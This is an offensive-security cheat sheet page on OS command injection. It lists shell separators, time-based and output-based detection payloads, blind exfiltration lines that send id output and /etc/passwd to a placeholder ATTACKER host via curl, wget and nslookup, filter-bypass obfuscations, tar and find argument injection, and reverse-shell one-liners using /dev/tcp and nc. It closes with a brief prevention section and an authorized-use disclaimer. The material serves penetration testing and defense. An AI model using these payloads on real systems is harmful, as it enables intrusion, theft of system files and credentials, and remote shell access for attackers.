โ† All cheat sheets

COMMAND-INJECTION

Authorized use only. Offensive reference for systems you own or are explicitly permitted to test. You are responsible for staying within the law.

Detecting and exploiting OS command injection: separators, blind
techniques, filter bypass and exfiltration. In-scope testing only.

SEPARATORS & OPERATORS#

    ;   command2            # run sequentially (Unix)
    &   command2            # background / chain
    &&  command2            # run if previous succeeded
    ||  command2            # run if previous failed
    |   command2            # pipe
    `command`               # backtick substitution
    $(command)              # command substitution
    %0a / \n                # newline injection

  Windows cmd:  &  &&  |  ||
  PowerShell:   ;  |  &(call)

DETECTION#

  Deterministic (time-based - reliable when no output):
    ; sleep 10
    & ping -c 10 127.0.0.1
    | timeout 10                          # Windows
    $(sleep 10)

  Output-based:
    ; id
    | whoami
    & type C:\windows\win.ini

  Out-of-band (DNS/HTTP) when blind:
    ; nslookup $(whoami).ATTACKER.oast.site
    ; curl http://ATTACKER/$(id | base64)

BLIND EXFILTRATION#

    # DNS
    ; nslookup `whoami`.ATTACKER.tld
    # HTTP
    ; wget http://ATTACKER/?d=$(cat /etc/passwd | base64 -w0)
    # Time-based bit-by-bit when only sleep is observable
    ; if [ $(id -u) -eq 0 ]; then sleep 10; fi

FILTER / WAF BYPASS#

  Spaces blocked:
    cat</etc/passwd
    {cat,/etc/passwd}
    IFS=,;cat$IFS/etc/passwd
    cat${IFS}/etc/passwd

  Keyword blocked (obfuscation):
    w'h'o'a'm'i
    who$@ami
    wh\oami
    /bin/c?t /etc/passwd            # wildcards
    echo d2hvYW1p | base64 -d | sh  # base64 the command

  Slashes blocked:
    ${HOME:0:1}         # -> "/"
    cat ${IFS}$(echo -e '\x2f')etc$(echo -e '\x2f')passwd

ARGUMENT / SANDBOX INJECTION#

    # Even without a separator, injecting a flag can be enough:
    # e.g. into a "ping <host>" -> "-f" flood, or into tar "--checkpoint-action=exec=sh"
    --checkpoint=1 --checkpoint-action=exec=sh cmd
    # Injecting into find:  -exec sh -c 'id' \;

UPGRADE TO A SHELL#

    ; bash -c 'bash -i >& /dev/tcp/ATTACKER/443 0>&1'
    | busybox nc ATTACKER 443 -e /bin/sh
    # See REVERSE SHELL cheatsheet / Reverse Shell Generator tool.

TOOLING#

    commix -u 'http://t/?q=INJECT'        # automated CMDi
    ffuf + custom payload wordlist
    Burp Intruder with SecLists command-injection lists

PREVENTION (blue side)#

  - Never build shell strings from user input; use exec arrays / APIs
    that don't invoke a shell.
  - Strict allowlist of arguments; avoid shell=True.
  - Least privilege for the executing process.

  See also: LFI-RFI, SSRF-BYPASS, REVERSE SHELL, LOLBAS.